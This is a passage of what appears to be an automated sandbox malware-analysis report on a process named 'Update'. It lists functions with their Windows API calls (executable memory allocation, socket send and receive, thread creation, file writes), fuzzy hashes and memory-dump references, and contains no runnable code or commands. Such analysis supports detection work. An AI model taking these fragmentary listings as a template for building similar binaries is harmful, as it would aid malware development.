                                              • Opcode Fuzzy Hash: df09960881f1881f3f893479b81fb5a2ef2b89d9b9eb7ed3ba159c1500acabf8
                                              • Instruction Fuzzy Hash: E5E065714083419AE300DF11C80DB9BB6F8EFD630CF415B0DF4C415041D3B956888B57
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 041A022B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550490289.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_41a0000_Update.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                              • Instruction ID: bd9f402af36a810cda87c9cffc6fe3581d01087201dad56f9a0eefaaf35da7fa
                                              • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                              • Instruction Fuzzy Hash: F4A14E79A00606EFDB14CFA9C9C0AAEBBB5FF48304F1481A9E415DB751E770E961CB90
                                              APIs
                                                • Part of subcall function 6C32ABE4: GetConsoleOutputCP.KERNEL32(8BAE044A,00000000,00000000,?), ref: 6C32AC47
                                              • WriteFile.KERNEL32(?,6C328E1C,00000000,6C333367,00000000,6C328E1C,00000000,00000000,?,6C333367,00000000,00000000,6C3332A4,6C328E1C,00000000,?), ref: 6C32A9BF
                                              • GetLastError.KERNEL32(?,6C333367,00000000,00000000,6C3332A4,6C328E1C,00000000,?,6C332208,00000000,6C328E1C), ref: 6C32A9C9
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ConsoleErrorFileLastOutputWrite
                                              • String ID:
                                              • API String ID: 2915228174-0
                                              • Opcode ID: 8b504ef41a3b33cac141d17c05c9e15db11ebdade211c1cb0e1e7da27be1d313
                                              • Instruction ID: ed3894e9832ac349ac1fb67b72af2a7015f64daa5d2806a3c253f77b1b76ac03
                                              • Opcode Fuzzy Hash: 8b504ef41a3b33cac141d17c05c9e15db11ebdade211c1cb0e1e7da27be1d313
                                              • Instruction Fuzzy Hash: 3B619EB1D04119AFDF01CFA9C984AEEBFB9EF0A308F150149E914A7641D33AD916DFA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Time_memmovetime
                                              • String ID:
                                              • API String ID: 1463837790-0
                                              • Opcode ID: a0e5ec005169978959b565d06ed5292441fb0b3ebdbcca9f727c14cda17ff1a0
                                              • Instruction ID: 9479b8ad1c5c8d713f6fedbb443b98d372e4d308c079ce7a6b937ddc69c4fe42
                                              • Opcode Fuzzy Hash: a0e5ec005169978959b565d06ed5292441fb0b3ebdbcca9f727c14cda17ff1a0
                                              • Instruction Fuzzy Hash: B251B072700A259FD711CFB9CAC0A6AB7A9FF8821471496ACED199B700DB35F941CB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: Time_memmovetime
                                              • String ID:
                                              • API String ID: 1463837790-0
                                              • Opcode ID: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
                                              • Instruction ID: 7472951ecdc6142c721ad3348498c8fe017ad8d952fa801f9fd3c423b9f36496
                                              • Opcode Fuzzy Hash: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
                                              • Instruction Fuzzy Hash: A5519F767006029FE316CF69C8C0A9BB7A9FF48294715C669E919CB709DB31FC51CB90
                                              APIs
                                              • __RTC_Initialize.LIBCMT ref: 6C30B2B2
                                                • Part of subcall function 6C30B65E: InitializeSListHead.KERNEL32(6C3A2058,6C30B2BC,6C397588,00000010,6C30B455,?,00000000,?,00000007,6C3975A8,00000010,6C30B468,?,?,6C30B4F1,?), ref: 6C30B663
                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C30B31C
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                              • String ID:
                                              • API String ID: 3231365870-0
                                              • Opcode ID: 2e741aada6656d01bd433bba50084bb0f26e8ee1e45ba6fa7614e6a2ec2294ec
                                              • Instruction ID: ba9a3aa44144f3dfefc18995f14cf5d6f339b50ec1db2137cc229d105d43a83a
                                              • Opcode Fuzzy Hash: 2e741aada6656d01bd433bba50084bb0f26e8ee1e45ba6fa7614e6a2ec2294ec
                                              • Instruction Fuzzy Hash: 5021F1337493099EDB049FB8A8107CD33A8AB1632DF20486DD5919BFC1EB675018CE66
                                              APIs
                                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003023
                                              • recv.WS2_32(?,?,00040000,00000000), ref: 10003044
                                                • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: __getptd_noexitrecvselect
                                              • String ID:
                                              • API String ID: 4248608111-0
                                              • Opcode ID: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
                                              • Instruction ID: 1cbb114b02e0d86a534962cf0a51f77a1151a50c8d60f66bd4e8238187776ab9
                                              • Opcode Fuzzy Hash: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
                                              • Instruction Fuzzy Hash: 7F21E770A01318EBFB11DF64DC95B9B73B8EF053D0F1081A5E5095B199DBB1AD84CBA1
                                              APIs
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,6C32A9A5,?,6C332208,6C328E1C,00000000,6C328E1C,00000000), ref: 6C32B0AF
                                              • GetLastError.KERNEL32(?,6C32A9A5,?,6C332208,6C328E1C,00000000,6C328E1C,00000000,00000000,?,6C333367,00000000,00000000,6C3332A4,6C328E1C,00000000), ref: 6C32B0D5
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastWrite
                                              • String ID:
                                              • API String ID: 442123175-0
                                              • Opcode ID: 56a8f16257bc8441cdd6df90cc8a1be4d393af92d686f96f2de4420a1d5e81bf
                                              • Instruction ID: f6a9bc33445af84c6fe3d0472966414cd85ee1a46595bebcde32272cbb08d44d
                                              • Opcode Fuzzy Hash: 56a8f16257bc8441cdd6df90cc8a1be4d393af92d686f96f2de4420a1d5e81bf
                                              • Instruction Fuzzy Hash: 5121B130A002199BCF1ACF29CC809DDF7B9EB49309F1481AAE906DB641D7319E46CF65
                                              APIs
                                              • __RTC_Initialize.LIBCMT ref: 6C30B3B3
                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6C30B3CD
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Initialize___scrt_uninitialize_crt
                                              • String ID:
                                              • API String ID: 2442719207-0
                                              • Opcode ID: 122fe017e9da82eb8bf56475845e5d17cfffb61212397f1ccd004abb56611483
                                              • Instruction ID: 3ebbcf10d3f81d74697d8344c5f49b37cd9e22fc0d75e844ae4207b602792d60
                                              • Opcode Fuzzy Hash: 122fe017e9da82eb8bf56475845e5d17cfffb61212397f1ccd004abb56611483
                                              • Instruction Fuzzy Hash: 99210233B48309DBDB04DFB998007DC37A8EB0671DF10452AE5149AF90CB7682198E62
                                              APIs
                                              • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000), ref: 6C1BF602
                                              • _strlen.LIBCMT ref: 6C1BF615
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: FolderPath_strlen
                                              • String ID:
                                              • API String ID: 1140449666-0
                                              • Opcode ID: fd36852034cb4471a56a9502d375f0bc23474c1d42516cc2fbc8b4b875fa233c
                                              • Instruction ID: c18bbff5aead577596488faf7a1a60d98aa4306499095027c371c6f26155b702
                                              • Opcode Fuzzy Hash: fd36852034cb4471a56a9502d375f0bc23474c1d42516cc2fbc8b4b875fa233c
                                              • Instruction Fuzzy Hash: EB11E6F69013456BD7305F359C44A9BBAFCEFD6308F11092AF885D2A01F77595488BA2
                                              APIs
                                              • _memcpy_s.LIBCMT ref: 6C1D084C
                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 6C1D0872
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AllocString_memcpy_s
                                              • String ID:
                                              • API String ID: 696070862-0
                                              • Opcode ID: ae6f4ba1efba958d3f42dff93831f1c1e0d1a39a7c3de38606ea996c65814f7a
                                              • Instruction ID: df4fc39d0655aff6f0d85c1189661557fd5f909ad381a824fa6cf3c4467a3cf8
                                              • Opcode Fuzzy Hash: ae6f4ba1efba958d3f42dff93831f1c1e0d1a39a7c3de38606ea996c65814f7a
                                              • Instruction Fuzzy Hash: A811C636700244AFEB009B598C44FAE7768EF61758F51402AF91597A50DB79E824CAA3
                                              APIs
                                              • send.WS2_32(?,?,00040000,00000000), ref: 04323291
                                              • send.WS2_32(?,?,?,00000000), ref: 043232CE
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: send
                                              • String ID:
                                              • API String ID: 2809346765-0
                                              • Opcode ID: 6821b56b3b2cfa9756cbdf5c635453f0948edf33ecae58db0fc71fc729a572cc
                                              • Instruction ID: b5ab9c0c6247ccda315c6ce0e776c2c9f4de3c41601d64b22e56b5b4674721de
                                              • Opcode Fuzzy Hash: 6821b56b3b2cfa9756cbdf5c635453f0948edf33ecae58db0fc71fc729a572cc
                                              • Instruction Fuzzy Hash: E911E572B01324B7D7608A7ADE88B5E77ACFF85364F106165FD08D7280D278BD418654
                                              APIs
                                              • SetFilePointerEx.KERNEL32(00000000,00000000,?,00008000,6C1BA407,00008000,6C328E1C,?,?,?,6C328BD7,6C328E1C,?,00000000,6C1BA407,?), ref: 6C328D8B
                                              • GetLastError.KERNEL32(00000000,?,?,?,6C328BD7,6C328E1C,?,00000000,6C1BA407,?,00000000,00008000,6C328E1C,?,?,6C331B8B), ref: 6C328D98
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: 4d1c7ac6b1728365e1526453604a60d57140f1ea38a1510171ae5500be27c7f1
                                              • Instruction ID: 867efce7ea691eb5b796198e637a09fad478c1fc2038d8be138be2527bde12c4
                                              • Opcode Fuzzy Hash: 4d1c7ac6b1728365e1526453604a60d57140f1ea38a1510171ae5500be27c7f1
                                              • Instruction Fuzzy Hash: 0A012233714655AFCF058F59CC09D9E3B7AEF96328B240209F8109B690EB72E945CFA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: SleepTimetime
                                              • String ID:
                                              • API String ID: 346578373-0
                                              • Opcode ID: 686423fa6eaeb525ef4398d10b63d93254f47a4ec1fc577624aae37f6ff5da66
                                              • Instruction ID: a3a44278c3843446c6247aa388dfa7d7d256c3a6f675345b24aff7386b17df5c
                                              • Opcode Fuzzy Hash: 686423fa6eaeb525ef4398d10b63d93254f47a4ec1fc577624aae37f6ff5da66
                                              • Instruction Fuzzy Hash: 6B01D435200215AFD315DF29C8C8BB9B7B9FF99301F144264EA1467180C739B9C6C7D1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: SleepTimetime
                                              • String ID:
                                              • API String ID: 346578373-0
                                              • Opcode ID: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
                                              • Instruction ID: 27fac5dcdbeed923c3366fb10e8a319fa95706dbc2a1d72b4a6ad2049d896b26
                                              • Opcode Fuzzy Hash: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
                                              • Instruction Fuzzy Hash: B501DF31A00206AFE302DF65C8C4BABB3F9FB99381F108624D1018B294C771ADD6C7E1
                                              APIs
                                              • HeapCreate.KERNEL32(00000004,00000000,00000000,0432E04E,00000000,04329800,?,?,?,00000000,0434125B,000000FF,?,0432E04E), ref: 0432CD1B
                                              • _free.LIBCMT ref: 0432CD56
                                                • Part of subcall function 04321280: __CxxThrowException@8.LIBCMT ref: 04321290
                                                • Part of subcall function 04321280: DeleteCriticalSection.KERNEL32(00000000,0432D3E6,04346624,?,?,0432D3E6,?,?,?,?,04345A40,00000000), ref: 043212A1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                              • String ID:
                                              • API String ID: 1116298128-0
                                              • Opcode ID: 9519f1e2840c67144cb03f3edab26d62cbfb2c05577478d8d7e7635f1b681885
                                              • Instruction ID: 92b3e223c8541a9dbe2ac31b6787a267a1123a219d57e8101d0359216f46bfb1
                                              • Opcode Fuzzy Hash: 9519f1e2840c67144cb03f3edab26d62cbfb2c05577478d8d7e7635f1b681885
                                              • Instruction Fuzzy Hash: A0017AB0A00B508FD7309F6A9944A57FAF8FF98700B105A1EE6DAC7A50D374A505CFA5
                                              APIs
                                              • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,10005AF2), ref: 1000642B
                                              • _free.LIBCMT ref: 10006466
                                                • Part of subcall function 10001280: __CxxThrowException@8.LIBCMT ref: 10001290
                                                • Part of subcall function 10001280: DeleteCriticalSection.KERNEL32(00000000,?,10017E78), ref: 100012A1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                              • String ID:
                                              • API String ID: 1116298128-0
                                              • Opcode ID: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
                                              • Instruction ID: d75aab6d42964042dd9719b22c7254e4122bf8c787039a32894d973a0e8f9c7d
                                              • Opcode Fuzzy Hash: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
                                              • Instruction Fuzzy Hash: D6017EF4A00B408FD321CF6A8884A47FAF9FF98750B104A1EE2DAC7A10D770A545CF55
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C1CD1E3
                                              • GetWindowDC.USER32(00000000,00000004,6C1E78A0,00000000), ref: 6C1CD20F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: H_prolog3Window
                                              • String ID:
                                              • API String ID: 616115145-0
                                              • Opcode ID: a435f171f658260e34b7effb47f6f7ae1972f58f226b76d8ae9ed7db3ed8df3f
                                              • Instruction ID: 04a7dd4b0d90eeb2e419c8bbff806e34907418983350d2c84f41b0a6df56c952
                                              • Opcode Fuzzy Hash: a435f171f658260e34b7effb47f6f7ae1972f58f226b76d8ae9ed7db3ed8df3f
                                              • Instruction Fuzzy Hash: C5F08CB0B01B158FDB54DFB8C50076E7AE0BF59304B10882EE65ACBB00DB78D5068F46
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,0432DF10,00000000,00000000,00000000), ref: 0432E49B
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,04331168,?,?,?,?,?,?,04346298,0000000C,04331210,?), ref: 0432E4A9
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: CreateObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 1891408510-0
                                              • Opcode ID: 53004c9bd081e870803ad77dacde4ada974f34d86323a07b21ae6d7d8febd3e3
                                              • Instruction ID: c0bf989ead569c3e38469eaf2a236dab84caf915d22f36052467fc2ae1ee2259
                                              • Opcode Fuzzy Hash: 53004c9bd081e870803ad77dacde4ada974f34d86323a07b21ae6d7d8febd3e3
                                              • Instruction Fuzzy Hash: 32E012B5444719BFDF509A54AD86E77339CD708770F206615B910D2640D939FC408A60
                                              APIs
                                              • __getptd.LIBCMT ref: 0432F98F
                                                • Part of subcall function 04333E5B: __getptd_noexit.LIBCMT ref: 04333E5E
                                                • Part of subcall function 04333E5B: __amsg_exit.LIBCMT ref: 04333E6B
                                                • Part of subcall function 0432F964: __getptd_noexit.LIBCMT ref: 0432F969
                                                • Part of subcall function 0432F964: __freeptd.LIBCMT ref: 0432F973
                                                • Part of subcall function 0432F964: ExitThread.KERNEL32 ref: 0432F97C
                                              • __XcptFilter.LIBCMT ref: 0432F9B0
                                                • Part of subcall function 0433418F: __getptd_noexit.LIBCMT ref: 04334195
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                              • String ID:
                                              • API String ID: 418257734-0
                                              • Opcode ID: 1fec46b3ee73eda22651a5640fe6d4661efe8146aa600078e195ad445de7c065
                                              • Instruction ID: e9af47bd9ae6df7664d46fa09161a43e4785e2133cc098e59c3f550b521a3c30
                                              • Opcode Fuzzy Hash: 1fec46b3ee73eda22651a5640fe6d4661efe8146aa600078e195ad445de7c065
